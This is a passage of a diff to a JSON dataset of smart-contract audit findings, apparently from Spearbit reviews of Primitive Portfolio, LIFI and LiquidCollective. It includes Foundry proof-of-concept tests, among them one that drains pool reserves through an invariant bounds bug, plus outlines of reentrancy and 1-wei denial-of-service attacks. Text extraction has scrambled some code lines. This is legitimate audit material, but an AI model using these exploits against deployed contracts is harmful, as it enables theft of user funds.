"https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The tradingFunction computing the invariant value of k = (y/K) - (1-x) + returns the wrong value at the bounds of x and y. The bounds of x are 0 and 1e18, the bounds of y are 0 and K, the strike price. If x or y is at these bounds, the corresponding term's computation is skipped and therefore implicitly set to 0, its initialization value. int256 invariantTermX; // (1-x) // @audit if x is at the bounds, the term remains 0 if (self.reserveXPerWad.isBetween(lowerBoundX + 1, upperBoundX - 1)) { invariantTermX = Gaussian.ppf(int256(WAD - self.reserveXPerWad)); } int256 invariantTermY; // (y/K) // @audit if y is at the bounds, the term remains 0 if (self.reserveYPerWad.isBetween(lowerBoundY + 1, upperBoundY - 1)) { invariantTermY = Gaussian.ppf( int256(self.reserveYPerWad.divWadUp(self.strikePriceWad)) ); } Note that = Gaussian.ppf is the probit function which is undefined at 0 and 1.0, but tends towards -infinity at 0 and +infinity at 1.0 = 1e18. (The closest values used in the Solidity approximation are Gaussian.ppf(1) = -8710427241990476442 ~ -8.71 and Gaussian.ppf(1e18-1) = 8710427241990476442 ~ 8.71.) This fact can be abused by an attacker to steal the pool reserves. For example, the y-term (y/K) will be a negative value for y/K < 0.5. Trading out all y reserve, will compute the new invariant with y set to 0 and the y-term (y/K) = (0) = -infinity is set to 0 instead, increasing the overall invariant, accepting the swap. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"solmate/utils/SafeCastLib.sol\"; import \"./Setup.sol\"; contract TestSpearbit is Setup { using SafeCastLib for uint256; using AssemblyLib for uint256; using AssemblyLib for uint128; using FixedPointMathLib for uint256; using FixedPointMathLib for uint128; function test_swap_all_out() public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { (uint256 reserveAsset, uint256 reserveQuote) = subject().getPoolReserves(ghost().poolId); bool sellAsset = true; uint128 amtIn = 2; // pass reserve-not-stale check after taking fee uint128 amtOut = uint128(reserveQuote); 4 uint256 prev = ghost().quote().to_token().balanceOf(actor()); Order memory order = Order({ useMax: false, poolId: ghost().poolId, input: amtIn, output: amtOut, sellAsset: sellAsset }); subject().swap(order); uint256 post = ghost().quote().to_token().balanceOf(actor()); assertTrue(post > prev, \"swap-failed\"); } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Primitive", + "Severity: Critical Risk" ] }, { - "title": "If statement does not check mintAmount properly", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "On the zapIn function, mintAmount is checked with the following If statement. However, It is directly getting contract balance instead of taking difference between mintAmount and preMintBalance. ... ... uint256 mintAmount = IERC20(address(fToken)).balanceOf(address(this)); if (!success && mintAmount == 0) { revert MintingError(res); } mintAmount = mintAmount - preMintBalance;", + "title": "getSpotPrice, approximateReservesGivenPrice, getStrategyData ignore time to maturity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "When calling getSpotPrice, getStrategyData or approximateReservesGivenPrice, the pool con- fig is transformed into a NormalCurve struct. This transformation always sets the time to maturity field to the entire duration 5 function transform(PortfolioConfig memory config) pure returns (NormalCurve memory) { return NormalCurve({ reserveXPerWad: 0, reserveYPerWad: 0, strikePriceWad: config.strikePriceWad, standardDeviationWad: config.volatilityBasisPoints.bpsToPercentWad(), timeRemainingSeconds: config.durationSeconds, invariant: 0 }); } Neither is the curve.timeRemainingSeconds value overridden with the correct value for the mentioned functions. The reported spot price will be wrong after the pool has been initialized and integrators cannot rely on this value.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Primitive", + "Severity: Medium Risk" ] }, { - "title": "Use address(0) for zero address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Its better to use shorthands provided by Solidity for popular constant values to improve readability and likelihood of errors. address internal constant NULL_ADDRESS = 0x0000000000000000000000000000000000000000; //address(0)", + "title": "Numerical error on larger trades favors the swapper relative to mathematically ideal pricing", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "To test the accuracy of the Solidity numerical methods used, a Python implementation of the swap logic was created using a library that supports arbitrary precision (https://mpmath.org/). Solidity swap execu- tions generated in a custom fuzz test were compared against arbitrary precision results using Foundry's ffi feature (https://book.getfoundry.sh/forge/differential-ffi-testing). Cases where the \"realized\" swap price was better for the swapper than the \"ideal\" swap price were flagged. Deviations in the swapper's favor as large as 25% were observed (and larger ones likely exist). These seem to be a function of the size of the swap made--larger swaps favor the swapper more than smaller swaps (in fact, deviations were observed to trend towards zero as swap size relative to pool size decreased). It is unclear if there's any problem in practice from this behavior--large swaps will still incur large slippage and are only incentivized when the price has \"jumped\" drastically; fees also help make up for losses. Without going further, it can be stated that there is a risk for pools with frequent discontinuous price changes to track the theoretical payoff more poorly, but further numerical investigations are needed to determine whether there's a serious concern. The test cases below require the simulation repo to be cloned into a Python virtual environment in a directory named primitive-math-venv with the needed dependencies at the same directory hierarchy level as the port- folio repository. That is, the portfolio/ directory and primitive-math-venv/ directories should be in the same folder, and the primitive-math-venv/ folder should contain the primitive-sim repository. The virtual environ- ment needs to be activated and have the mpmath, scipy, numpy, and eth_abi dependencies installed via pip or another method. Alternatively, these can be installed globally in which case the primitive-math-venv directory does not need to be a virtual environment. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"solmate/utils/SafeCastLib.sol\"; import \"./Setup.sol\"; 6 contract TestNumericalDeviation is Setup { using SafeCastLib for uint256; using AssemblyLib for uint256; using AssemblyLib for uint128; using FixedPointMathLib for uint256; using FixedPointMathLib for uint128; bool printLogs = true; function _fuzz_random_args( bool sellAsset, uint256 amountIn, uint256 amountOut ) internal returns (bool swapExecuted) { Order memory maxOrder = subject().getMaxOrder(ghost().poolId, sellAsset, actor()); amountIn = bound(amountIn, maxOrder.input / 1000 + 1, maxOrder.input); amountOut = subject().getAmountOut(ghost().poolId, sellAsset, amountIn, actor()); if (printLogs) console.log(\"amountOut: \", amountOut); Order memory order = Order({ useMax: false, poolId: ghost().poolId, input: amountIn.safeCastTo128(), output: amountOut.safeCastTo128(), sellAsset: sellAsset }); try subject().simulateSwap({ order: order, timestamp: block.timestamp, swapper: actor() }) returns (bool swapSuccess, int256 prev, int256 post) { try subject().swap(order) { assertTrue( swapSuccess, \"simulateSwap-failed but swap succeeded\" ); assertTrue(post >= prev, \"post-invariant-not-gte-prev\"); swapExecuted = true; } catch { assertTrue( !swapSuccess, \"simulateSwap-succeeded but swap failed\" ); } } catch { // pass this case } } struct TestVals { uint256 strike; uint256 volatility_bps; uint256 durationSeconds; uint256 ttm; } // fuzzing entrypoint used to find violating swaps function test_swap_deviation(uint256 amtIn, uint256 amtOut) 7 public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { PortfolioPool memory pool = ghost().pool(); (uint256 preXPerL, uint256 preYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log(\"x_start: \", preXPerL); console.log(\"y_start: \", preYPerL); } TestVals memory tv; { uint256 creationTimestamp; (tv.strike, tv.volatility_bps, tv.durationSeconds, creationTimestamp,) = NormalStrategy(pool.strategy).configs(ghost().poolId); tv.ttm = creationTimestamp + tv.durationSeconds - block.timestamp; if (printLogs) { console.log(\"strike: \", tv.strike); console.log(\"volatility_bps: \", tv.volatility_bps); console.log(\"durationSeconds: \", tv.durationSeconds); console.log(\"creationTimestamp: \", creationTimestamp); console.log(\"block.timestamp: \", block.timestamp); console.log(\"ttm: \", tv.ttm); console.log(\"protocol fee: \", subject().protocolFee()); console.log(\"pool fee: \", pool.feeBasisPoints); console.log(\"pool priority fee: \", pool.priorityFeeBasisPoints); } } bool sellAsset = true; if (printLogs) console.log(\"sellAsset: \", sellAsset); { bool swapExecuted = _fuzz_random_args(sellAsset, amtIn, amtOut); if (!swapExecuted) return; // not interesting to check swap if it didn't execute } pool = ghost().pool(); (uint256 postXPerL, uint256 postYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log(\"x_end: \", postXPerL); console.log(\"y_end: \", postYPerL); } = \"python3\"; = \"../primitive-math-venv/primitive-sim/check_swap_result.py\"; = \"--x\"; = vm.toString(preXPerL); = \"--y\"; = vm.toString(preYPerL); = \"--strike\"; = vm.toString(tv.strike); = \"--vol_bps\"; = vm.toString(tv.volatility_bps); string[] memory cmds = new string[](18); cmds[0] cmds[1] cmds[2] cmds[3] cmds[4] cmds[5] cmds[6] cmds[7] cmds[8] cmds[9] cmds[10] = \"--duration\"; cmds[11] = vm.toString(tv.durationSeconds); cmds[12] = \"--ttm\"; cmds[13] = vm.toString(tv.ttm); 8 cmds[14] = \"--xprime\"; cmds[15] = vm.toString(postXPerL); cmds[16] = \"--yprime\"; cmds[17] = vm.toString(postYPerL); bytes memory result = vm.ffi(cmds); (uint256 idealFinalDependentPerL) = abi.decode(result, (uint256)); if (printLogs) console.log(\"idealFinalDependentPerL: \", idealFinalDependentPerL); uint256 postDependentPerL = sellAsset ? postYPerL : postXPerL; // Only worried if swap was _better_ than ideal if (idealFinalDependentPerL > postDependentPerL) { uint256 diff = idealFinalDependentPerL - postDependentPerL; uint256 percentErrWad = diff * 1e18 / idealFinalDependentPerL; if (printLogs) console.log(\"%% err wad: \", percentErrWad); // assert at worst 25% error assertLt(percentErrWad, 0.25 * 1e18); } } function test_swap_gt_2pct_dev_in_swapper_favor() public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { uint256 amtIn = 6552423086988641261559668799172253742131420409793952225706522955; uint256 amtOut = 0; PortfolioPool memory pool = ghost().pool(); (uint256 preXPerL, uint256 preYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log(\"x_start: \", preXPerL); console.log(\"y_start: \", preYPerL); } TestVals memory tv; { uint256 creationTimestamp; (tv.strike, tv.volatility_bps, tv.durationSeconds, creationTimestamp,) = NormalStrategy(pool.strategy).configs(ghost().poolId); tv.ttm = creationTimestamp + tv.durationSeconds - block.timestamp; if (printLogs) { console.log(\"strike: \", tv.strike); console.log(\"volatility_bps: \", tv.volatility_bps); console.log(\"durationSeconds: \", tv.durationSeconds); console.log(\"creationTimestamp: \", creationTimestamp); console.log(\"block.timestamp: \", block.timestamp); console.log(\"ttm: \", tv.ttm); console.log(\"protocol fee: \", subject().protocolFee()); console.log(\"pool fee: \", pool.feeBasisPoints); console.log(\"pool priority fee: \", pool.priorityFeeBasisPoints); } } bool sellAsset = true; if (printLogs) console.log(\"sellAsset: \", sellAsset); { bool swapExecuted = _fuzz_random_args(sellAsset, amtIn, amtOut); 9 if (!swapExecuted) return; // not interesting to check swap if it didn't execute } pool = ghost().pool(); (uint256 postXPerL, uint256 postYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log(\"x_end: \", postXPerL); console.log(\"y_end: \", postYPerL); } = \"python3\"; = \"../primitive-math-venv/primitive-sim/check_swap_result.py\"; = \"--x\"; = vm.toString(preXPerL); = \"--y\"; = vm.toString(preYPerL); = \"--strike\"; = vm.toString(tv.strike); = \"--vol_bps\"; = vm.toString(tv.volatility_bps); string[] memory cmds = new string[](18); cmds[0] cmds[1] cmds[2] cmds[3] cmds[4] cmds[5] cmds[6] cmds[7] cmds[8] cmds[9] cmds[10] = \"--duration\"; cmds[11] = vm.toString(tv.durationSeconds); cmds[12] = \"--ttm\"; cmds[13] = vm.toString(tv.ttm); cmds[14] = \"--xprime\"; cmds[15] = vm.toString(postXPerL); cmds[16] = \"--yprime\"; cmds[17] = vm.toString(postYPerL); bytes memory result = vm.ffi(cmds); (uint256 idealFinalYPerL) = abi.decode(result, (uint256)); if (printLogs) console.log(\"idealFinalYPerL: \", idealFinalYPerL); // Only worried if swap was _better_ than ideal if (idealFinalYPerL > postYPerL) { uint256 diff = idealFinalYPerL - postYPerL; uint256 percentErrWad = diff * 1e18 / idealFinalYPerL; if (printLogs) console.log(\"%% err wad: \", percentErrWad); // assert at worst 2% error assertLt(percentErrWad, 0.02 * 1e18); } } function test_swap_gt_5pct_dev_in_swapper_favor() public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { uint256 amtIn = 524204019310836059902749478707356665714276202503631350973429403; uint256 amtOut = 0; PortfolioPool memory pool = ghost().pool(); (uint256 preXPerL, uint256 preYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log(\"x_start: \", preXPerL); console.log(\"y_start: \", preYPerL); } TestVals memory tv; 10 { uint256 creationTimestamp; (tv.strike, tv.volatility_bps, tv.durationSeconds, creationTimestamp,) = NormalStrategy(pool.strategy).configs(ghost().poolId); tv.ttm = creationTimestamp + tv.durationSeconds - block.timestamp; if (printLogs) { console.log(\"strike: \", tv.strike); console.log(\"volatility_bps: \", tv.volatility_bps); console.log(\"durationSeconds: \", tv.durationSeconds); console.log(\"creationTimestamp: \", creationTimestamp); console.log(\"block.timestamp: \", block.timestamp); console.log(\"ttm: \", tv.ttm); console.log(\"protocol fee: \", subject().protocolFee()); console.log(\"pool fee: \", pool.feeBasisPoints); console.log(\"pool priority fee: \", pool.priorityFeeBasisPoints); } } bool sellAsset = true; if (printLogs) console.log(\"sellAsset: \", sellAsset); { bool swapExecuted = _fuzz_random_args(sellAsset, amtIn, amtOut); if (!swapExecuted) return; // not interesting to check swap if it didn't execute } pool = ghost().pool(); (uint256 postXPerL, uint256 postYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log(\"x_end: \", postXPerL); console.log(\"y_end: \", postYPerL); } = \"python3\"; = \"../primitive-math-venv/primitive-sim/check_swap_result.py\"; = \"--x\"; = vm.toString(preXPerL); = \"--y\"; = vm.toString(preYPerL); = \"--strike\"; = vm.toString(tv.strike); = \"--vol_bps\"; = vm.toString(tv.volatility_bps); string[] memory cmds = new string[](18); cmds[0] cmds[1] cmds[2] cmds[3] cmds[4] cmds[5] cmds[6] cmds[7] cmds[8] cmds[9] cmds[10] = \"--duration\"; cmds[11] = vm.toString(tv.durationSeconds); cmds[12] = \"--ttm\"; cmds[13] = vm.toString(tv.ttm); cmds[14] = \"--xprime\"; cmds[15] = vm.toString(postXPerL); cmds[16] = \"--yprime\"; cmds[17] = vm.toString(postYPerL); bytes memory result = vm.ffi(cmds); (uint256 idealFinalYPerL) = abi.decode(result, (uint256)); if (printLogs) console.log(\"idealFinalYPerL: \", idealFinalYPerL); // Only worried if swap was _better_ than ideal if (idealFinalYPerL > postYPerL) { uint256 diff = idealFinalYPerL - postYPerL; uint256 percentErrWad = diff * 1e18 / idealFinalYPerL; if (printLogs) console.log(\"%% err wad: \", percentErrWad); 11 // assert at worst 2% error assertLt(percentErrWad, 0.05 * 1e18); } } function test_swap_gt_25pct_dev_in_swapper_favor() public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { uint256 amtIn = 110109023928019935126448015360767432374367360662791991077231763772041488708545; uint256 amtOut = 0; PortfolioPool memory pool = ghost().pool(); (uint256 preXPerL, uint256 preYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log(\"x_start: \", preXPerL); console.log(\"y_start: \", preYPerL); } TestVals memory tv; { uint256 creationTimestamp; (tv.strike, tv.volatility_bps, tv.durationSeconds, creationTimestamp,) = NormalStrategy(pool.strategy).configs(ghost().poolId); tv.ttm = creationTimestamp + tv.durationSeconds - block.timestamp; if (printLogs) { console.log(\"strike: \", tv.strike); console.log(\"volatility_bps: \", tv.volatility_bps); console.log(\"durationSeconds: \", tv.durationSeconds); console.log(\"creationTimestamp: \", creationTimestamp); console.log(\"block.timestamp: \", block.timestamp); console.log(\"ttm: \", tv.ttm); console.log(\"protocol fee: \", subject().protocolFee()); console.log(\"pool fee: \", pool.feeBasisPoints); console.log(\"pool priority fee: \", pool.priorityFeeBasisPoints); } } bool sellAsset = true; if (printLogs) console.log(\"sellAsset: \", sellAsset); { bool swapExecuted = _fuzz_random_args(sellAsset, amtIn, amtOut); if (!swapExecuted) return; // not interesting to check swap if it didn't execute } pool = ghost().pool(); (uint256 postXPerL, uint256 postYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log(\"x_end: \", postXPerL); console.log(\"y_end: \", postYPerL); } string[] memory cmds = new string[](18); cmds[0] cmds[1] cmds[2] cmds[3] cmds[4] = \"python3\"; = \"../primitive-math-venv/primitive-sim/check_swap_result.py\"; = \"--x\"; = vm.toString(preXPerL); = \"--y\"; 12 = vm.toString(preYPerL); = \"--strike\"; = vm.toString(tv.strike); = \"--vol_bps\"; = vm.toString(tv.volatility_bps); cmds[5] cmds[6] cmds[7] cmds[8] cmds[9] cmds[10] = \"--duration\"; cmds[11] = vm.toString(tv.durationSeconds); cmds[12] = \"--ttm\"; cmds[13] = vm.toString(tv.ttm); cmds[14] = \"--xprime\"; cmds[15] = vm.toString(postXPerL); cmds[16] = \"--yprime\"; cmds[17] = vm.toString(postYPerL); bytes memory result = vm.ffi(cmds); (uint256 idealFinalYPerL) = abi.decode(result, (uint256)); if (printLogs) console.log(\"idealFinalYPerL: \", idealFinalYPerL); // Only worried if swap was _better_ than ideal if (idealFinalYPerL > postYPerL) { uint256 diff = idealFinalYPerL - postYPerL; uint256 percentErrWad = diff * 1e18 / idealFinalYPerL; if (printLogs) console.log(\"%% err wad: \", percentErrWad); // assert at worst 25% error assertLt(percentErrWad, 0.25 * 1e18); } } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Primitive", + "Severity: Low Risk" ] }, { - "title": "Better variable naming", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "MAX_INT is defined to be the maximum value of uint256 data type: uint256 private constant MAX_INT = type(uint256).max; This variable name can be interpreted as the maximum value of int256 data type which is lower than type(uint256).max.", + "title": "getMaxOrder overestimates output values", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The getMaxOrder function adds + 1 to the output value, overestimating the output value. This can lead to failed swaps if this value is used. tempOutput = pool.virtualY - lowerY.mulWadDown(pool.liquidity) + 1; also easy It's erY.mulWadDown(pool.liquidity) + 1 = pool.virtualY + 1, more than the pool reserves. that with lowerY = 0 we see to have i.e., tempOutput = pool.virtualY - low- the max out amount would be", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Primitive", + "Severity: Low Risk" ] }, { - "title": "Event is missing indexed fields", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Index event fields make the field more quickly accessible to off-chain tools that parse events. How- ever, note that each index field costs extra gas during emission, so its not necessarily best to index the maximum allowed per event (three fields).", + "title": "Improve reentrancy guards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "Previously, only settlement performed calls to arbitrary addresses through ERC20 transfers. With recent additions, like the ERC1155._mint and user-provided strategies, single actions like allocate and swap also perform calls to potentially malicious contracts. This increases the attack surface for reentrancy attacks. The current way of protecting against reentrancy works by setting multicall flags (_currentMulticall) and locks (preLock() and postLock()) on multicalls and single-action calls. However, the single calls essentially skip reen- trancy guards if the outer context is a multicall. This still allows for reentrancy through control flows like the following: // reenter during multicall's action execution multicall preLock() singleCall() reenter during current execution singeCall() preLock(): passes because we're in multicall skips settlement postLock(): passes because we're in multicall _currentMulticall = false; settlement() postLock() // reenter during multicall's settlement multicall preLock() singleCall preLock(): ... postLock(): `_locked = 1` _currentMulticall = false; settlement() reenter singeCall() passes preLock because not locked mutliCall() passes multicall reentrancy guard because not in multicall passes preLock because not locked ... settlement finishes postLock()", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Primitive", + "Severity: Low Risk" ] }, { - "title": "Remove misleading comment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "WithdrawFacet.sol has the following misleading comment which can be removed. Its unclear why this comment was made. address self = address(this); // workaround for a possible solidity bug", + "title": "approximatePriceGivenX does not need to compute y-bounds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The approximatePriceGivenX function does not need to compute the y-bounds by calling self.getReserveYBounds().", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Primitive", + "Severity: Gas Optimization" ] }, { - "title": "Redundant events/errors/imports on the contracts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "During the code review, It has been observed that several events and errors are not used in the contracts. With the deleting redundant events and errors, gas can be saved. FusePoolZap.sol#L28 - CannotDepositNativeToken GenericSwapFacet.sol#L7 - ZeroPostSwapBalance WormholeFacet.sol#L12 - InvalidAmount and InvalidConfig HyphenFacet.sol#L32 - HyphenInitialized HyphenFacet.sol#L9 - InvalidAmount and InvalidConfig HopFacet.sol#L9 - InvalidAmount, InvalidConfig and InvalidBridgeConfigLength HopFacet.sol#L36- HopInitialized PolygonBridgeFacet.sol#L28 - InvalidConfig Executor.sol#L5 - IAxelarGasService AcrossFacet.sol#L37 - UseWethInstead, InvalidAmount, NativeValueWithERC, InvalidConfig NXTPFacet.sol#L9 - InvalidAmount, NativeValueWithERC, NoSwapDataProvided, InvalidConfig", + "title": "Unnecessary computations in NormalStrategy.beforeSwap", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The NormalStrategy.sol.beforeSwap function calls getSwapInvariants to simulate an entire swap with current and post-swap invariants. However, only the current invariant value is used.", "labels": [ "Spearbit", - "LIFI", - "Severity: Informational" + "Primitive", + "Severity: Gas Optimization" ] }, { - "title": "forceSlow option is disabled on the AmarokFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "On the AmarokFacet contract, forceSlow option is disabled. According to documentation, forceS- low is an option that allows users to take the Nomad slow path (~30 mins) instead of paying routers a 0.05% fee on their transaction. ... IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({ params: IConnextHandler.CallParams({ to: _bridgeData.receiver, callData: _bridgeData.callData, originDomain: _bridgeData.srcChainDomain, destinationDomain: _bridgeData.dstChainDomain, agent: _bridgeData.receiver, recovery: msg.sender, forceSlow: false, receiveLocal: false, callback: address(0), callbackFee: 0, relayerFee: 0, slippageTol: _bridgeData.slippageTol }), transactingAssetId: _bridgeData.assetId, amount: _amount }); ...", + "title": "Pools can use malicious strategies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "Anyone can create pools and configure the pool to use a custom strategy. A malicious strategy can disable swapping and (de-)allocating at any time, as well as enable privileged parties to trade out all pool reserves by implementing custom logic in the validateSwap function.", "labels": [ "Spearbit", - "LIFI", + "Primitive", "Severity: Informational" ] }, { - "title": "Incomplete NatSpec", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Some functions are missing @param for some of their parameters. Given that NatSpec is an impor- tant part of code documentation, this affects code comprehension, auditability and usability.", + "title": "findRootForSwappingIn functions should use MINIMUM_INVARIANT_DELTA", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The findRootForSwappingInX and findRootForSwappingInY functions add + 1 to the previous curve invariant tradingFunction(curve) - (curve.invariant + 1)", "labels": [ "Spearbit", - "LIFI", + "Primitive", "Severity: Informational" ] }, { - "title": "Use nonReentrant modifier in a consistent way", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "AxelarFacet, zapIn of the contract FusePoolZap and completeBridgeTokensViaStargate() - swapAndCom- pleteBridgeTokensViaStargate of the StargateFacet dont have a nonReentrant modifier. All other facets that integrate with the external contract do have this modifier. executeCallWithTokenViaAxelar of contract AxelarFacet { function executeCallWithTokenViaAxelar(...) ... { } function executeCallViaAxelar(...) ... { } } contract FusePoolZap { function zapIn(...) ... { } } There are 2 versions of sgReceive() / completeBridgeTokensViaStargate() which use different locations for nonReentrant. The makes the code more difficult to maintain and verify. contract StargateFacet is ILiFi, SwapperV2, ReentrancyGuard { function sgReceive(...) external nonReentrant { ... this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, receiver); ... } function completeBridgeTokensViaStargate(...) external { ... } } contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function sgReceive(...) external { ... this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, payable(receiver)); ... } function swapAndCompleteBridgeTokensViaStargate(...) external payable nonReentrant { } }", + "title": "Unused Errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The NormalStrategyLib_UpperPriceLimitReached and NormalStrategyLib_LowerPriceLim- itReached errors are not used.", "labels": [ "Spearbit", - "LIFI", + "Primitive", "Severity: Informational" ] }, { - "title": "Typos on the codebase", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Across the codebase, there are typos on the comments. cancelOnwershipTransfer -> cancelOwnershipTransfer. addresss -> address. Conatains -> Contains. Intitiates -> Initiates.", + "title": "getSwapInvariants order output can be 1 instead of 2", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The getSwapInvariants function is used to simulate swaps for the getAmountOut and beforeSwap functions. These functions use an artificial output value of 2 such that the function does not revert.", "labels": [ "Spearbit", - "LIFI", + "Primitive", "Severity: Informational" ] }, { - "title": "Store all error messages in GenericErrors.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The file GenericErrors.sol contains several error messages and is used from most other solidity files. However several other error messages are defined in the solidity files themselves. It would be more con- sistent and easier to maintain to store these in GenericErrors.sol as well. Note: the Periphery contract also contains error messages which are not listed below. Here are the error messages contained in the solidity files: Facets/AcrossFacet.sol:37: Facets/AmarokFacet.sol:31: Facets/ArbitrumBridgeFacet.sol:30: Facets/GnosisBridgeFacet.sol:31: Facets/GnosisBridgeFacet.sol:32: Facets/OmniBridgeFacet.sol:27: Facets/OptimismBridgeFacet.sol:29: Facets/OwnershipFacet.sol:20: Facets/OwnershipFacet.sol:21: Facets/OwnershipFacet.sol:22: Facets/OwnershipFacet.sol:23: Facets/PolygonBridgeFacet.sol:28: Facets/PolygonBridgeFacet.sol:29: Facets/StargateFacet.sol:39: Facets/StargateFacet.sol:40: Facets/StargateFacet.sol:41: Facets/WithdrawFacet.sol:20: Facets/WithdrawFacet.sol:21: Helpers/ReentrancyGuard.sol:20: Libraries/LibAccess.sol:18: Libraries/LibSwap.sol:9: error UseWethInstead(); error InvalidReceiver(); error InvalidReceiver(); error InvalidDstChainId(); error InvalidSendingToken(); error InvalidReceiver(); error InvalidReceiver(); error NoNullOwner(); error NewOwnerMustNotBeSelf(); error NoPendingOwnershipTransfer(); error NotPendingOwner(); error InvalidConfig(); error InvalidReceiver(); error InvalidConfig(); error InvalidStargateRouter(); error InvalidCaller(); error NotEnoughBalance(uint256 requested, uint256 available); error WithdrawFailed(); error ReentrancyError(); error UnAuthorized(); error NoSwapFromZeroBalance();", + "title": "AfterCreate event uses wrong durationSeconds value if pool is perpetual", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The AfterCreate uses the cached config.durationSeconds value but the real value the config storage struct is initialized with will be SECONDS_PER_YEAR in the case of perpetual pools.", "labels": [ "Spearbit", - "LIFI", + "Primitive", "Severity: Informational" ] }, { - "title": "A malicious user could DOS a vesting schedule by sending only 1 wei of TLC to the vesting escrow address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "An external user who owns some TLC tokens could DOS the vesting schedule of any user by sending just 1 wei of TLC to the escrow address related to the vesting schedule. By doing that: The creator of the vesting schedule will not be able to revoke the vesting schedule. The beneficiary of the vesting schedule will not be able to release any vested tokens until the end of the vesting schedule. Any external contracts or dApps will not be able to call computeVestingReleasableAmount . In practice, all the functions that internally call _computeVestingReleasableAmount will revert because of an un- derflow error when called before the vesting schedule ends. The underflow error leasableAmount will enter uint256 releasedAmount = _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) - balanceOf(_escrow); is thrown because, when called before the schedule ends, _computeVestingRe- try to compute the if (_time < _vestingSchedule.end) branch and will In this case, _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) will always be lower than balanceOf(_escrow) and the contract will revert with an underflow error. When the vesting period ends, the contract will not enter the if (_time < _vestingSchedule.end) and the user will be able to gain the whole vested amount plus the extra amount of TLC sent to the escrow account by the malicious user. Scenario: 1) Bob owns 1 TLC token. 2) Alluvial creates a vesting schedule for Alice like the following example: createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); 3) Bob sends 1 TLC token to the vesting schedule escrow account of the Alice vesting schedule. 8 4) After the cliff period, Alice should be able to release 1 TLC token. Because now balanceOf(_escrow) is 11 it will underflow as _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) returns 10. Find below a test case showing all three different DOS scenarios: //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import \"forge-std/Test.sol\"; import \"../src/TLC.1.sol\"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return 